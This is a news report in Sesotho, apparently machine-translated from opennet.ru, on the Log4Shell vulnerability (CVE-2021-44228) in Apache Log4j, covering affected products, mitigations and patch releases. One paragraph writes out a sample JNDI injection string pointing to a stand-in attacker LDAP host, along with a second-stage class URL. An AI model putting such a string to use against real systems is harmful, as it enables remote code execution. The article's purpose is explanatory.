Ho Apache Log4j, moralo o tsebahalang oa ho hlophisa ho rengoa ha lifate lits'ebetsong tsa Java, ho na le ts'oaetso e kholo e lumellang hore khoutu e sebelisoe ha boleng bo hlophisitsoeng ka mokhoa o khethehileng "{jndi:URL}" bo ngolloa ho log. Tlhaselo e ka etsoa lits'ebetsong tsa Java tse bolokang litekanyetso tse amoheloang ho tsoa mehloling e kantle, mohlala, ha u bonts'a maemo a thata melaetsa ea liphoso.
Hoa hlokomeleha hore hoo e ka bang merero eohle e sebelisang meralo e kang Apache Struts, Apache Solr, Apache Druid kapa Apache Flink e angoa ke bothata, ho kenyeletsoa Steam, Apple iCloud, bareki ba Minecraft le li-server. Ho lebelletsoe hore bofokoli bo ka lebisa tlhaselong e kholo ea lits'ebetso tsa koporasi, ho pheta nalane ea bofokoli bo boholo ho moralo oa Apache Struts, oo, ho latela khakanyo e mpe, e sebelisoang lits'ebetsong tsa webo ka 65% ea Fortune. Lik'hamphani tsa 100. Ho kenyelletsa le boiteko ba ho hlahloba marang-rang bakeng sa mekhoa e tlokotsing.
Bothata bona bo mpefatsoa ke taba ea hore ho se ho phatlalalitsoe ts'ebetso ea ts'ebetso, empa litokiso tsa makala a tsitsitseng ha li so lokisoe. Sekhetho sa CVE ha se so abeloe. Tokiso e kenyellelitsoe feela lekaleng la liteko la log4j-2.15.0-rc1. E le mokhoa oa ho thibela bofokoli, ho khothaletsoa ho beha parameter ea log4j2.formatMsgNoLookups hore e be 'nete.
Bothata bo bakoa ke taba ea hore log4j e tšehetsa ho sebetsana le limaske tse khethehileng "{}" meleng e hlahisoang ho log, moo lipotso tsa JNDI (Java Naming le Directory Interface) li ka etsoang. Tlhaselo e fella ka ho fetisa khoele ka ho fetola "${jndi:ldap://attacker.com/a}", ha e sebetsa, log4j e tla romela kopo ea LDAP bakeng sa tsela e eang sehlopheng sa Java ho ea ho seva sa attacker.com. . Tsela e khutlisitsoeng ke seva sa mohlaseli (mohlala, http://second-stage.attacker.com/Exploit.class) e tla kengoa le ho etsoa ho latela mokhoa oa hajoale, o lumellang mohlaseli ho sebelisa khoutu e sa lebelloang sistimi e nang le litokelo tsa ts'ebeliso ea hajoale.
Sehlomathiso sa 1: Ho ba kotsing ho abetsoe sekhetho CVE-2021-44228.
Sehlomathiso sa 2: Mokhoa oa ho feta ts'ireletso e kentsoeng ke tokollo log4j-2.15.0-rc1 e khethiloe. Ntlafatso e ncha, log4j-2.15.0-rc2, e khothalelitsoe ka ts'ireletso e felletseng khahlano le tlokotsi. Khoutu e totobatsa phetoho e amanang le ho ba sieo ha pheliso e sa tloaelehang molemong oa ho sebelisa URL ea JNDI e fometsoeng hampe.
Source: opennet.ru